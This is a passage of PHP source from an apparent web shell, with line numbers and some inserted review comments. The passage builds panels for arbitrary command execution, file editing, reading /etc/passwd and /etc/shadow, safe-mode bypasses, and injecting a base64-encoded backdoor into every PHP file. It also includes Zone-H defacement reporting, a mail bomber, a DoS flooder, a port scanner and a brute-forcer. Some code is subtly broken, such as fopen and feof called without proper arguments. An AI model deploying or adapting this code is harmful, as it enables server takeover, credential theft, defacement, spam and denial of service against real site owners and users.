2888 <td align="left">File : </td><td><font class=txt><?php echo $_GET['myfilepath'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['myfilepath']); ?>')"><?php echo filepermscolor($_GET['myfilepath']);?></a></td>
2889 </tr>
2890 <tr>
2891 <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['myfilepath']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
2892 </tr>
2893 </table>
2894 <textarea name="content" rows="15" cols="100" class="box"><?php
2895 $content = htmlspecialchars(file_get_contents($_GET['myfilepath']));
2896 if($content)
2897 {
2898 echo $content;
2899 }
2900 else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
2901 {
2902 if(filesize($_GET['myfilepath']) != 0 )
2903 {
2904 fopen($_GET['myfilepath']);
2905 while(!feof())
2906 {
2907 echo htmlspecialchars(fgets($_GET['myfilepath']));
2908 }
2909 }
2910 }
2911
2912 ?>
2913 </textarea><br />
2914 <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['myfilepath']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
2915 </form>
2916 <?php
2917 }
2918 else
2919 echo "File does not exist !!!!";
2920}
2921else if(isset($_POST['file']) && isset($_POST['content']))
2922{
2923 if(file_exists($_POST['file']))
2924 {
2925 $handle = fopen($_POST['file'],"w");
2926 if(fwrite($handle,$_POST['content']))
2927 echo "<font class=txt>File Saved Successfully!</font>";
2928 else
2929 echo "Cannot Write into File";
2930 }
2931 else
2932 {
2933 echo "File Name Specified does not exists!";
2934 }
2935}
2936else if(isset($_POST["SendNowToZoneH"]))
2937{
2938 $hacker = $_POST['defacer'];
2939 $method = $_POST['hackmode'];
2940 $neden = $_POST['reason'];
2941 $site = $_POST['domain'];
2942
2943 if (empty($hacker))
2944 {
2945 die("<center><font size=3>[-] You Must Fill the Attacker name !</font></center>");
2946 }
2947 elseif($method == "--------SELECT--------")
2948 {
2949 die("<center><font size=3>[-] You Must Select The Method !</center>");
2950 }
2951 elseif($neden == "--------SELECT--------")
2952 {
2953 die("<center><font size=3>[-] You Must Select The Reason</center>");
2954 }
2955 elseif(empty($site))
2956 {
2957 die("<center><font size=3>[-] You Must Inter the Sites List !</center>");
2958 }
2959 // Zone-h Poster: submits each listed site to Zone-H's notify endpoint (public defacement archive) with one curl POST per site; the response is not checked
/**
 * Zone-H notifier: POSTs one defacement record to $url (the caller passes
 * http://zone-h.org/notify/single) and returns the raw response body.
 *
 * Fields sent: defacer=$hacker, domain1=$site, hackmode=$hackmode, reason=$reson.
 * The values are concatenated without urlencode(), so a '&' or '=' inside any
 * of them corrupts the form body. No CURLOPT_TIMEOUT is set, so an unresponsive
 * endpoint can block the request indefinitely; redirects are followed.
 * Returns whatever curl_exec() yields: the body as a string, or false on a
 * transport failure. The caller in this file ignores the return value.
 * ($reson is the original's spelling of "reason".)
 */
2960 function ZoneH($url, $hacker, $hackmode,$reson, $site )
2961 {
2962 $k = curl_init();
2963 curl_setopt($k, CURLOPT_URL, $url);
2964 curl_setopt($k,CURLOPT_POST,true);
2965 curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson); // NOTE(review): raw concatenation, no urlencode() on any field
2966 curl_setopt($k,CURLOPT_FOLLOWLOCATION, true); // redirects are followed
2967 curl_setopt($k, CURLOPT_RETURNTRANSFER, true); // body is returned, not echoed
2968 $kubra = curl_exec($k);
2969 curl_close($k);
2970 return $kubra;
2971 }
2972
2973 $i = 0;
2974 $sites = explode("\n", $site);
2975 echo "<pre class=ml1 style='margin-top:5px'>";
2976 while($i < count($sites))
2977 {
2978 if(substr($sites[$i], 0, 4) != "http")
2979 {
2980 $sites[$i] = "http://".$sites[$i];
2981 }
2982 ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
2983 echo "<font class=txt size=3>Site : ".$sites[$i]." Posted !</font><br>";
2984 ++$i;
2985 }
2986
2987 echo "<font class=txt size=4>Sending Sites To Zone-H Has Been Completed Successfully !! </font></pre>";
2988}
2989else if(isset($_GET['executemycmd']))
2990{
2991 $comm = $_GET['executemycmd'];
2992 chdir($_GET['executepath']);
2993 echo shell_exec($comm);
2994}
2995// View Passwd file: copies /etc/passwd through the compress.zlib:// wrapper into a tempnam() file and displays it; if copy() fails, shows a uid-range form instead
2996else if(isset($_GET['passwd']))
2997{
2998 $test='';
2999 $tempp= tempnam($test, "cx");
3000 $get = "/etc/passwd";
3001 $name=@posix_getpwuid(@fileowner($get));
3002 $group=@posix_getgrgid(@filegroup($get));
3003 $owner = $name['name']. " / ". $group['name'];
3004 ?>
3005 <table style="width:57%;">
3006 <tr>
3007 <td align="left">File : </td><td><font class=txt><?php echo $get; ?></font></td><td align="left">Permissions : </td><td><?php echo filepermscolor($get);?></td>
3008 </tr>
3009 <tr>
3010 <td>Size : </td><td><?php echo filesize($get);?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
3011 </tr>
3012 </table>
3013 <?php
3014 if(copy("compress.zlib://".$get, $tempp))
3015 {
3016 $fopenzo = fopen($tempp, "r");
3017 $freadz = fread($fopenzo, filesize($tempp));
3018 fclose($fopenzo);
3019 $source = htmlspecialchars($freadz);
3020 echo "<tr><td><center><textarea rows='20' cols='80' class=box name='source'>$source</textarea><br>";
3021 unlink($tempp);
3022 }
3023 else
3024 {
3025 ?>
3026 <form>
3027 <input type="hidden" name="etcpasswd">
3028 <table class="tbl" border="1" cellpadding="5" cellspacing="5" align="center" style="width:40%;">
3029 <tr>
3030 <td>From : </td><td><input type="text" name="val1" class="sbox" value="1"></td>
3031 </tr>
3032 <tr>
3033 <td>To : </td><td><input type="text" name="val2" class="sbox" value="1000"></td>
3034 </tr>
3035 <tr>
3036 <td colspan="2" align="center"><input type="submit" value=" Go " class="but"></td>
3037 </tr>
3038 </table><br>
3039 </form>
3040 <?php
3041 }
3042}
3043else if(isset($_GET['shadow']))
3044{
3045 $test='';
3046 $tempp= tempnam($test, "cx");
3047 $get = "/etc/shadow";
3048 if(copy("compress.zlib://".$get, $tempp))
3049 {
3050 $fopenzo = fopen($tempp, "r");
3051 $freadz = fread($fopenzo, filesize($tempp));
3052 fclose($fopenzo);
3053 $source = htmlspecialchars($freadz);
3054 echo "<tr><td><center><font size='3' face='Verdana'>$get</font><br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
3055 unlink($tempp);
3056 }
3057}
3058else if(isset($_GET['bomb']))
3059{
3060 ?><div id="showmail"></div>
3061 <form>
3062 <table id="margins" style="width:100%;">
3063 <tr>
3064 <td style="width:30%;">To</td>
3065 <td>
3066 <input class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/>
3067 </td>
3068 </tr>
3069 <tr>
3070 <td style="width:30%;">Subject</td>
3071 <td>
3072 <input type="text" class="box" name="subject" value="Dhanush Here!" onFocus="if(this.value == 'Dhanush Here!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!';" />
3073 </td>
3074 </tr>
3075 <tr>
3076 <td style="width:30%;">No. of Times</td>
3077 <td>
3078 <input class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';"/>
3079 </td>
3080 </tr>
3081 <tr>
3082 <td style="width:30%;">Pad your message (Less spam detection)</td>
3083 <td><input type="checkbox" name="padding"/></td>
3084 </tr>
3085 <tr>
3086 <td colspan="2"><textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!</textarea></td>
3087 </tr>
3088 <tr>
3089 <td rowspan="2">
3090 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('dobombing',to.value,subject.value,message.value,'null',times.value,padding.value)" class="but" value=" Bomb! "/>
3091 </td>
3092 </tr>
3093 </table>
3094 </form>
3095 <?php
3096}
3097
3098// Mass Mailer: From/To/Subject/Message form that calls the 'massmailing' sendmail handler via JavaScript
3099else if(isset($_GET['mail']))
3100{
3101 ?><div id="showmail"></div>
3102 <div align="left">
3103 <form>
3104 <table align="left" style="width:100%;">
3105 <tr>
3106 <td style="width:10%;">From</td>
3107 <td style="width:80%;" align="left"><input name="from" class="box" value="Hello@abcd.in" onFocus="if(this.value == 'president@whitehouse.gov')this.value = '';" onBlur="if(this.value=='')this.value='president@whitehouse.gov';"/></td>
3108 </tr>
3109
3110 <tr>
3111 <td style="width:20%;">To</td>
3112 <td style="width:80%;"><input class="box" class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/></td>
3113 </tr>
3114
3115 <tr>
3116 <td style="width:20%;">Subject</td>
3117 <td style="width:80%;"><input type="text" class="box" name="subject" value="Dhanush Here!!" onFocus="if(this.value == 'Dhanush Here!!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!!';" /></td>
3118 </tr>
3119
3120
3121 <tr>
3122 <td colspan="2">
3123 <textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!!</textarea>
3124 </td>
3125 </tr>
3126
3127
3128 <tr>
3129 <td rowspan="2">
3130 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('massmailing',to.value,subject.value,message.value,from.value)" class="but" value=" Send! "/>
3131 </td>
3132 </tr>
3133 </table>
3134 </form></div>
3135 <?php
3136}
3137// Symlink tools menu: Get Domains, Symlink Server, Symlink File and Script Locator, each loaded into #showdata via getdata()
3138else if(isset($_REQUEST["symlinkserver"]))
3139{
3140 ?>
3141 <center><table><tr>
3142 <td><a href=javascript:void(0) onClick="getdata('domains')"><font class=txt><b>| Get Domains |</b></font></a></td>
3143 <td><a href=javascript:void(0) onClick="getdata('symlink')"><font class=txt><b>| Symlink Server |</b></font></a></td>
3144 <td><a href=javascript:void(0) onClick="getdata('symlinkfile')"><font class=txt><b>| Symlink File |</b></font></a></td>
3145 <td><a href=javascript:void(0) onClick="getdata('script')"><font class=txt><b>| Script Locator |</b></font></a></td>
3146 </tr></table></center><br>
3147 <div id="showdata"></div><?php
3148}
3149// Forum Manager: menu linking the Forum Defacer and Forum Password Changer panels (defaceforum / passwordchange branches above)
3150else if(isset($_REQUEST["forum"]))
3151{ ?>
3152 <center><table><tr><td><a href=# onClick="getdata('defaceforum')"><font class=txt size="4">| Forum Defacer |</font></a></td>
3153 <td><a href=# onClick="getdata('passwordchange')"><font class=txt size="4">| Forum Password Changer |</font></a></td>
3154 </tr></table></center><br><div id="showdata"></div>
3155 <?php
3156}
3157// Sec info: table of server settings relevant to the bypass panels (curl and DB extensions, open_basedir, safe_mode_exec_dir, PHP version, magic quotes, server admin), followed by mysecinfo()
3158else if(isset($_GET['secinfo']))
3159{ ?><div id=showdata></div>
3160<center><div id="showmydata"></div>
3161</center>
3162<br><center><font color =red size=5>Server security information</font><br><br></center>
3163 <table style="width:100%;border-color:#333333;" border="1">
3164 <tr>
3165 <td style="width:7%;">Curl</td>
3166 <td style="width:7%;">Oracle</td>
3167 <td style="width:7%;">MySQL</td>
3168 <td style="width:7%;">MSSQL</td>
3169 <td style="width:7%;">PostgreSQL</td>
3170 <td style="width:12%;">Open Base Directory</td>
3171 <td style="width:10%;">Safe_Exec_Dir</td>
3172 <td style="width:7%;">PHP Version</td>
3173 <td style="width:7%;">Magic Quotes</td>
3174 <td style="width:7%;">Server Admin</td>
3175 </tr>
3176 <tr>
3177 <td style="width:7%;"><font class="txt"><?php curlinfo(); ?></font></td>
3178 <td style="width:7%;"><font class="txt"><?php oracleinfo(); ?></font></td>
3179 <td style="width:7%;"><font class="txt"><?php mysqlinfo(); ?></font></td>
3180 <td style="width:7%;"><font class="txt"><?php mssqlinfo(); ?></font></td>
3181 <td style="width:7%;"><font class="txt"><?php postgresqlinfo(); ?></font></td>
3182 <td style="width:12%;"><font class="txt"><?php echo $basedir; ?></font></td>
3183 <td style="width:10%;"><font class="txt"><?php if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font >NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};} ?></font></td>
3184 <td style="width:7%;"><font class="txt"><?php phpver(); ?></font></td>
3185 <td style="width:7%;"><font class="txt"><?php magic_quote(); ?></font></td>
3186 <td style="width:7%;"><font class="txt"><?php serveradmin(); ?></font></td>
3187 </tr>
3188</table><br> <?php
3189 mysecinfo();
3190}
3191// Code Injector: form to append to ("Apender") or overwrite every file of a given extension under a directory with a backdoor stub; the default stub is base64-decoded into the textarea
3192
3193else if(isset($_GET['injector']))
3194{
3195 ?>
3196 <form method='POST'>
3197 <table id="margins">
3198 <tr>
3199 <td width="100" class="title">
3200 Directory
3201 </td>
3202 <td>
3203 <input class="box" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
3204 </td>
3205
3206 </tr>
3207 <tr>
3208 <td class="title">
3209 Mode
3210 </td>
3211 <td>
3212 <select style="width: 400px;" name="mode" class="box">
3213 <option value="Apender">Apender</option>
3214 <option value="Overwriter">Overwriter</option>
3215 </select>
3216 </td>
3217 </tr>
3218 <tr>
3219 <td class="title">
3220 File Type
3221 </td>
3222 <td>
3223 <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
3224 </td>
3225 </tr>
3226 <tr>
3227 <td>Create A backdoor by injecting this code in every php file of current directory</td>
3228 </tr>
3229
3230 <tr>
3231 <td colspan="2">
3232 <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode("PD9waHAgJGNtZCA9IDw8PEVPRA0KY21kDQpFT0Q7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFskY21kXSkpIHsNCnN5c3RlbSgkX1JFUVVFU1RbJGNtZF0pOyB9ID8+"); ?></textarea>
3233 </td>
3234 </tr>
3235 <tr>
3236 <td rowspan="2">
3237 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="codeinjector(pathtomass.value,mode.value,filetype.value,injectthis.value)" class="but" value="Inject "/>
3238 </td>
3239 </tr>
3240 </form>
3241 </table><div id="showinject"</div>
3242 <?php
3243}
3244// Bypass: form panel for the safe_mode/open_basedir file-read techniques implemented in the 'bypassit' branch above (copy, imap_open, LOAD DATA LOCAL INFILE, curl file://, include, posix_getpwuid, tempnam, symlink, shell utilities)
3245else if(isset($_GET["bypass"]))
3246{
3247 ?><center><div id="showbyp"></div></center>
3248 <table cellpadding="7" align="center" border="3" style="width:70%;border-color:#333333;">
3249 <tr>
3250 <td align="center" colspan="2"><font color="#FF0000" size="3">Safe mode bypass</font></td>
3251 </tr>
3252 <tr>
3253 <td align="center">
3254 <p>Using copy() function</p>
3255 <form onSubmit="bypassfun('copy',copy.value);return false;">
3256 <input type="text" name="copy" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('copy',copy.value)" value="bypass" class="but">
3257 </form>
3258 </td>
3259 <td align="center">
3260 <p>Using imap() function</p>
3261 <form onSubmit="bypassfun('imap',imap.value);return false;">
3262 <input type="text" name="imap" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('imap',imap.value)" value="bypass" class="but">
3263 </form>
3264 </td>
3265 </tr>
3266
3267 <tr>
3268 <td align="center">
3269 <p>Using sql() function</p>
3270 <form onSubmit="bypassfun('sql',sql.value);return false;">
3271 <input type="text" name="sql" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('sql',sql.value)" value="bypass" class="but">
3272 </form>
3273 </td>
3274 <td align="center">
3275 <p>Using Curl() function</p>
3276 <form onSubmit="bypassfun('curl',curl.value);return false;">
3277 <input type="text" name="curl" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('curl',curl.value)" value="bypass" class="but">
3278 </form>
3279 </td>
3280 </tr>
3281
3282 <tr>
3283 <td align="center">
3284 <p>Bypass using include()</p>
3285 <form onSubmit="bypassfun('include',include.value);return false;">
3286 <input type="text" name="include" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('include',include.value)" value="bypass" class="but">
3287 </form>
3288 </td>
3289 <td align="center">
3290 <p>Using id() function</p>
3291 <form onSubmit="bypassfun('id',id.value);return false;">
3292 <input type="text" name="id" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('id',id.value)" value="bypass" class="but">
3293 </form>
3294 </td>
3295 </tr>
3296
3297 <tr>
3298 <td align="center">
3299 <p>Using tempnam() function</p>
3300 <form onSubmit="bypassfun('tempnam',tempname.value);return false;">
3301 <input type="text" name="tempname" value="../../../etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('tempnam',tempname.value)" value="bypass" class="but">
3302 </form>
3303 </td>
3304 <td align="center">
3305 <p>Using symlink() function</p>
3306 <form onSubmit="bypassfun('symlnk',sym.value);return false;">
3307 <input type="text" name="sym" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('symlnk',sym.value)" value="bypass" class="but">
3308 </form>
3309 </td>
3310 </tr>
3311 <tr>
3312 <td colspan=2 align="center">
3313 <p>Using Bypass function</p>
3314 <form onSubmit="bypassfun('newtype',newtype.value,optiontype.value);return false;">
3315 <input type="text" name="newtype" value="/etc/passwd" class="sbox">
3316 <select id="optiontype" class=sbox>
3317 <option value="tac">tac</option>
3318 <option value="more">more</option>
3319 <option value="less">less</option>
3320 <option value="rev">rev</option>
3321 <option value="xxd">xxd</option>
3322 </select>
3323 <input type="button" OnClick="bypassfun('newtype',newtype.value,optiontype.value)" value="bypass" class="but">
3324 </form>
3325 </td>
3326 </tr>
3327 </table>
3328 </form>
3329 <?php
3330}
3331// Fuzzer: form feeding the 'fuzzer' branch above (repeated TCP GET requests carrying the multiplied message with printf-style specifiers appended)
3332else if(isset($_GET['fuzz']))
3333{
3334 ?>
3335 <form method="GET">
3336 <table id="margins">
3337 <tr>
3338 <td width="400" class="title">
3339 IP
3340 </td>
3341 <td>
3342 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
3343 </td>
3344 </tr>
3345
3346 <tr>
3347 <td class="title">
3348 Port
3349 </td>
3350 <td>
3351 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
3352 </td>
3353 </tr>
3354
3355 <tr>
3356 <td class="title">
3357 Timeout
3358 </td>
3359 <td>
3360 <input type="text" class="box" name="time" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';"/>
3361 </td>
3362 </tr>
3363
3364
3365 <tr>
3366 <td class="title">
3367 No of times
3368 </td>
3369 <td>
3370 <input type="text" class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';" />
3371 </td>
3372 </tr>
3373
3374 <tr>
3375 <td class="title">
3376 Message (The message Should be long and it will be multiplied with the value after it)
3377 </td>
3378 <td>
3379 <input class="box" name="message" value="%S%x--Some Garbage here --%x%S" onFocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onBlur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
3380 </td>
3381 <td>
3382 x
3383 </td>
3384 <td width="20">
3385 <input style="width: 30px;" class="box" name="messageMultiplier" value="10" />
3386 </td>
3387 </tr>
3388
3389 <tr>
3390 <td rowspan="2">
3391 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('fuzzer',myip.value,port.value,time.value,times.value,message.value,messageMultiplier.value)" class="but" value=" Submit "/>
3392 </td>
3393 </tr>
3394 </table>
3395 </form><div id="showdos"></div>
3396 <?php
3397}
3398// Zone-h Poster: submission form (attacker name, numeric method code, numeric reason code, site list) handled by the SendNowToZoneH branch above; only warns if curl is unavailable
3399 else if(isset($_GET["zone"]))
3400 {
3401 if(!function_exists('curl_version'))
3402 {
3403 echo "<pre style='margin-top:5px'><center><font >PHP CURL NOT EXIST</font></center></pre>";
3404 }
3405 ?>
3406 <center><font size="4" color="#FF0000">Zone-h Poster</font></center>
3407 <form action="<?php echo $self; ?>" method="post">
3408 <table align="center" cellpadding="5" border="0">
3409 <tr>
3410 <td>
3411 <input type="text" name="defacer" value="Attacker" class="box" /></td></tr>
3412 <tr><td>
3413 <select name="hackmode" class="box">
3414 <option >--------SELECT--------</option>
3415 <option value="1">known vulnerability (i.e. unpatched system)</option>
3416 <option value="2" >undisclosed (new) vulnerability</option>
3417 <option value="3" >configuration / admin. mistake</option>
3418 <option value="4" >brute force attack</option>
3419 <option value="5" >social engineering</option>
3420 <option value="6" >Web Server intrusion</option>
3421 <option value="7" >Web Server external module intrusion</option>
3422 <option value="8" >Mail Server intrusion</option>
3423 <option value="9" >FTP Server intrusion</option>
3424 <option value="10" >SSH Server intrusion</option>
3425 <option value="11" >Telnet Server intrusion</option>
3426 <option value="12" >RPC Server intrusion</option>
3427 <option value="13" >Shares misconfiguration</option>
3428 <option value="14" >Other Server intrusion</option>
3429 <option value="15" >SQL Injection</option>
3430 <option value="16" >URL Poisoning</option>
3431 <option value="17" >File Inclusion</option>
3432 <option value="18" >Other Web Application bug</option>
3433 <option value="19" >Remote administrative panel access bruteforcing</option>
3434 <option value="20" >Remote administrative panel access password guessing</option>
3435 <option value="21" >Remote administrative panel access social engineering</option>
3436 <option value="22" >Attack against administrator(password stealing/sniffing)</option>
3437 <option value="23" >Access credentials through Man In the Middle attack</option>
3438 <option value="24" >Remote service password guessing</option>
3439 <option value="25" >Remote service password bruteforce</option>
3440 <option value="26" >Rerouting after attacking the Firewall</option>
3441 <option value="27" >Rerouting after attacking the Router</option>
3442 <option value="28" >DNS attack through social engineering</option>
3443 <option value="29" >DNS attack through cache poisoning</option>
3444 <option value="30" >Not available</option>
3445 </select>
3446 </td></tr>
3447 <tr><td>
3448 <select name="reason" class="box">
3449 <option >--------SELECT--------</option>
3450 <option value="1" >Heh...just for fun!</option>
3451 <option value="2" >Revenge against that website</option>
3452 <option value="3" >Political reasons</option>
3453 <option value="4" >As a challenge</option>
3454 <option value="5" >I just want to be the best defacer</option>
3455 <option value="6" >Patriotism</option>
3456 <option value="7" >Not available</option>
3457 </select></td></tr>
3458 <tr><td>
3459 <textarea name="domain" class="box" cols="47" rows="9">List Of Domains</textarea></td></tr>
3460 <tr><td>
3461 <input type="button" onClick="zoneh(defacer.value,hackmode.value,reason.value,domain.value)" class="but" value="Send Now !" /></td></tr></table>
3462 </form><div id="showzone"></div>
3463 <?php }
3464//DDos
3465 else if(isset($_GET['dos']))
3466 {
3467 ?>
3468 <form method="GET">
3469 <table id="margins">
3470 <tr>
3471 <td width="400" class="title">
3472 IP
3473 </td>
3474 <td>
3475 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
3476 </td>
3477 </tr>
3478
3479 <tr>
3480 <td class="title">
3481 Port
3482 </td>
3483 <td>
3484 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
3485 </td>
3486 </tr>
3487
3488 <tr>
3489 <td class="title">
3490 Timeout <font >(Time in seconds)</font>
3491 </td>
3492 <td>
3493 <input type="text" class="box" name="timeout" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';" />
3494 </td>
3495 </tr>
3496 <tr>
3497 <td class="title">
3498 Execution Time <font >(Time in seconds)</font>
3499 </td>
3500 <td>
3501 <input type="text" class="box" name="exTime" value="10" onFocus="if(this.value == '10')this.value = '';" onBlur="if(this.value=='')this.value='10';"/>
3502 </td>
3503 </tr>
3504 <tr>
3505 <td class="title">
3506 No of Bytes per/packet
3507 </td>
3508 <td>
3509 <input type="text" class="box" name="noOfBytes" value="999999" onFocus="if(this.value == '999999')this.value = '';" onBlur="if(this.value=='')this.value='999999';"/>
3510 </td>
3511 </tr>
3512 <tr>
3513 <td rowspan="2">
3514 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('dosser',myip.value,port.value,timeout.value,exTime.value,noOfBytes.value,'null')" class="but" value=" Attack >> "/>
3515 </td>
3516 </tr>
3517 </table>
3518 </form><div id="showdos"></div>
3519 <?php
3520}
3521else if(isset($_GET['mailbomb']))
3522{ ?>
3523 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('bomb')"><font class=txt size="4">| Mail Bomber |</font></a></td>
3524 <td><a href=javascript:void(0) onClick="getdata('mail')"><font class=txt size="4">| Mass Mailer |</font></a></td></tr></table></center><br><div id=showdata></div>
3525<?php
3526}
3527else if(isset($_GET['tools']))
3528 {
3529 ?>
3530 <center><br><form onSubmit="getport(host.value,protocol.value);return false;">
3531 <table cellpadding="5" border="3" style="border-color:#333333; width:50%;">
3532 <tr>
3533 <td colspan="2" align="center"><b><font size='4' color="#FF0000">Port Scanner<br></font></b></td>
3534 </tr>
3535 <tr>
3536 <td align="center">
3537 <input class="sbox" type='text' name='host' value='<?php echo $_SERVER["SERVER_ADDR"]; ?>' >
3538 </td>
3539 <td align="center">
3540 <select class="sbox" name='protocol'>
3541 <option value='tcp'>tcp</option>
3542 <option value='udp'>udp</option>
3543 </select>
3544 </td>
3545 <tr>
3546 <td colspan="2" align="center"><input class="but" type='button' onClick="getport(host.value,protocol.value)" value='Scan Ports'></td>
3547 </tr>
3548 </form>
3549 <tr><td colspan=2><div id="showports"></div>
3550 </td></tr></table>
3551
3552 <br>
3553 <form onSubmit="bruteforce(prototype.value,serverport.value,login.value,dict.value);return false;">
3554 <table cellpadding="5" border="2" style="border-color:#333333; width:50%;">
3555 <tr>
3556 <td colspan="2" align="center"><font size="4">BruteForce</font></td>
3557 </tr>
3558 <tr>
3559 <td>Type : </td>
3560 <td>
3561 <select name="prototype" class="sbox">
3562 <option value="ftp">FTP</option>
3563 <option value="mysql">MYSQL</option>
3564 <option value="postgresql">PostgreSql</option>
3565 </select>
3566 </td>
3567 </tr>
3568 <tr>
3569 <td>Server <b>:</b> Port : </td>
3570 <td><input type="text" name="serverport" value="<?php echo $_SERVER["SERVER_ADDR"]; ?>" class="sbox"></td>
3571 </tr>
3572 <tr>
3573 <td valign="middle">Brute type : </td>
3574 <td><label><input type=radio name=mytype value="1" checked> /etc/passwd</label><label><input type=checkbox id="reverse" name=reverse value=1 checked> reverse (login -> nigol)</label><hr color="#1B1B1B">
3575 <label><input type=radio name=mytype value="2"> Dictionary</label><br>
3576 Login : <input type="text" name="login" value="root" class="sbox"><br>
3577 Dictionary : <input type="text" name="dict" value="<?php echo getcwd() . $directorysperator; ?>passwd.txt" class="sbox">
3578 </td>
3579 </tr>
3580 <tr>
3581 <td colspan="2" align="center"><input type="button" onClick="bruteforce(prototype.value,serverport.value,login.value,dict.value)" value="Attack >>" class="but"></td>
3582 </tr>
3583 </form><tr><td colspan="2" id="showbrute"></td></tr>
3584 </table>
3585 </center><br>
3586 <?php
3587}
3588else if (isset($_GET["phpc"]))
3589{
3590 ?>
3591 <div id="showresult"></div>
3592 <form name="frm">
3593 <textarea name="code" class="box" cols="120" rows="10">phpinfo();</textarea>
3594 <br /><br />
3595 <input name="submit" value="Execute This COde! " class="but" onClick="execode(code.value)" type="button" />
3596 <label><input type="checkbox" id="intext" name="intext" value="disp"> <font class=txt size="3">Display in Textarea</font></label>
3597 </form>
3598 <?php
3599}
3600else if(isset($_GET["exploit"]))
3601{
3602 if(!isset($_GET["rootexploit"]))
3603 {
3604 ?>
3605 <center>
3606 <form action="<?php echo $self; ?>" method="get" target="_blank">
3607 <input type="hidden" name="exploit">
3608 <table border="1" cellpadding="5" cellspacing="4" style="width:50%;border-color:#333333;">
3609 <tr>
3610 <td style="height:60px;">
3611 <font size="4" class=txt>Select Website</font></td><td>
3612 <p><select id="rootexploit" name="rootexploit" class="box">
3613 <option value="exploit-db">Exploit-db</option>
3614 <option value="packetstormsecurity">Packetstormsecurity</option>
3615 <option value="exploitsearch">Exploitsearch</option>
3616 <option value="shodanhq">Shodanhq</option>
3617 </select></p></td></tr><tr><td colspan="2" align="center" style="height:40px;">
3618 <input type="submit" value="Search" class="but"></td></tr></table>
3619 </form></center><br>
3620
3621 <?php
3622 }
3623 else
3624 {
3625 //exploit search
3626 $Lversion = php_uname(r);
3627 $OSV = php_uname(s);
3628 if(eregi('Linux',$OSV))
3629 {
3630 $Lversion=substr($Lversion,0,6);
3631 if($_GET['rootexploit'] == "exploit-db")
3632 {
3633 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=Linux+Kernel+$Lversion");
3634 }
3635 else if($_GET['rootexploit'] == "packetstormsecurity")
3636 {
3637 header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=Linux+Kernel+$Lversion");
3638 }
3639 else if($_GET['rootexploit'] == "exploitsearch")
3640 {
3641 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=Linux+Kernel+$Lversion");
3642 }
3643 else if($_GET['rootexploit'] == "shodanhq")
3644 {
3645 header("Location:http://www.shodanhq.com/exploits?q=Linux+Kernel+$Lversion");
3646 }
3647 }
3648 else
3649 {
3650 $Lversion=substr($Lversion,0,3);
3651 if($_GET['rootexploit'] == "exploit-db")
3652 {
3653 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$OSV+Lversion");
3654 }
3655 else if($_GET['rootexploit'] == "packetstormsecurity")
3656 {
